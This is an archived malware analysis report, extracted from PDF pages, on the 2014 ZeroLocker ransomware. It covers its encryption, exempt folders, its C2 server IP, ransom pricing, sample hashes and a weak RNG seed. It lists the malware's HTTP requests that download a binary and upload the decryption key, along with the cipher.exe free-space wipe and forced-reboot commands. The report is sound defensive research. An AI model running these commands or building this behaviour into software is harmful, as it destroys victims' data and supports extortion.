Introduction to the ZeroLocker ransomware By Kimberly Archived: 2026-04-05 20:30:11 UTC A new ransomware called ZeroLocker has surfaced. The files are encrypted with AES (*) encryption. Currently the threat is considered as the most destructive ransomware we have seen to date. ZeroLocker does not only target data files; it encrypts ALL files on the hard drive, including executables, with AES encryption unless they are located in certain folders or larger than 20 MegaBytes. The folders exempt from encryption are the ones containing the following keywords: Windows, WINDOWS, Program Files, ZeroLocker and Desktop. Encrypted files will have .encrypted appended to their filename. ZeroLocker performs several outbound connections to 5.199.171.47, a VPs located in Skri Lanka. When the threat has finished encrypting the files, it will run the C:\WINDOWS\SYSTEM32\CIPHER.EXE /W:C:\ command in order to overwrite all deleted data on the hard drive. Doing so makes it impossible to use recovery tools to restore files. The main issue with ZeroLocker resides in the fact that when it uploads the decryption key to the server, the C2 returns a 404 not found because the requested page doesn’t exist on the server. Therefore the key isn’t stored in any database or file for later recovery. The only way to recover the key would be to manually filter through the HTTP access logs if they still exist. This coding mistake on behalf of the developer essentially renders the encrypted computer completely useless as the victim is unable to retrieve the decryption key even after paying the ransom. ZeroLocker is considered as very destructive especially for companies that have custom software installed under normal paths. Currently the infection doesn’t delete the Windows System Restore points so files can be restored using a program like Shadow Explorer or Windows built-in Previous Version. This could change at any stage of course. Payment is only accepted in Bitcoins. The initial ransom is $300, after 5 days the price will increase to $600 and after 10 days the victim will have to pay $1000. http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html Page 1 of 10 Source: Bleeping Computer The first instance of ZeroLocker was discovered on a French forum assisting people with malware removal on August 8, 2014. ZeroLocker Overview of functions. The author didn't use AES encryption but used the RijndaelManaged class from the .NET Framework. http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html Page 2 of 10 http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html Page 3 of 10 The random number generator is seeded Envionment.TickCount, a 32-bit signed integer containing the amount of time in milliseconds that has passed since the last time the computer was started. The strength of the password is less than 32-bit. http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html Page 4 of 10 Upon execution the threat will: http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html Page 5 of 10 1. Create a folder called C:\ZeroLocker 2. Perform the following outbound connection and save the binary as C:\ZeroLocker\ZERORESCUE.EXE GET /patriote/sansviolence 3. A corresponding registry entry is created so that ZERORESCUE.EXE runs each time the computer starts. 4. Retrieve the Bitcoin address used to pay the ransom and save it as C:\ZeroLocker\ADDRESS.DAT GET /zConfig/171386 1CkwfDadjXPhp3XrUU5J8hQhUtbecH7t1N 5. Upload the decryption key to the server. The request returns a 404. GET /zImprimer/[ID based upon MAC-ADDRESS]-[PASSWORD]-[BITCOIN ADDRESS] 6. Encrypt the files on the hard drive. For each encrypted file the original file is deleted. 7. Perform the following outbound connection and save the response as C:\ZeroLocker\LOG.DAT GET /enc/1 8. Launch an instance of C:\WINDOWS\SYSTEM32\CIPHER.EXE with the following command line parameters: cipher.exe" /w:c:\ http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html Page 6 of 10 9. Reboot the compromised computer using the following command: c:\windows\system32\shutdown.exe" /r /t 0 /f 10. Upon reboot the ransomware notice is displayed via C:\ZeroLocker\ZERORESCUE.EXE. Clicking the "Decrypt Files" button opens an internet connection with the VPS. Unfortunately the request returns a 404 rendering decryption impossible even after paying the ransom. A message informs the victim that the payment hasn’t been received or processed yet and to try again later as it takes up to 24h to activate the key. GET /[ID based upon MAC-ADDRESS]/key http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html Page 7 of 10 Global overview. http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html Page 8 of 10 ID based upon MAC-ADDRESS. http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html Page 9 of 10 Samples Analysed At the time of the analysis on August 18, 2014 we were aware of the following MD5 hashes: bd0a3c308a6d3372817a474b7c653097: TimeDateStamp: Tue Aug 05 14:27:06 2014 3772a3deeb781803a907ed36ee10681d: TimeDateStamp: Wed Aug 06 11:01:48 2014 Both samples contain the following compile leftovers: c:\users\george\desktop\projects\zerolocker\testing stuff\testing stuff\obj\debug\task manager.pdb The actor behind ZeroLocker is also associated with several Bitcoin Miners. If our research has helped you, please consider making a donation through PayPal. Source: http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html Page 10 of 10 http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html The random number generator is seeded Envionment.TickCount, a 32-bit signed integer containing the amount of time in milliseconds that has passed since the last time the computer was started. The strength of the password is less than 32-bit. Page 4 of 10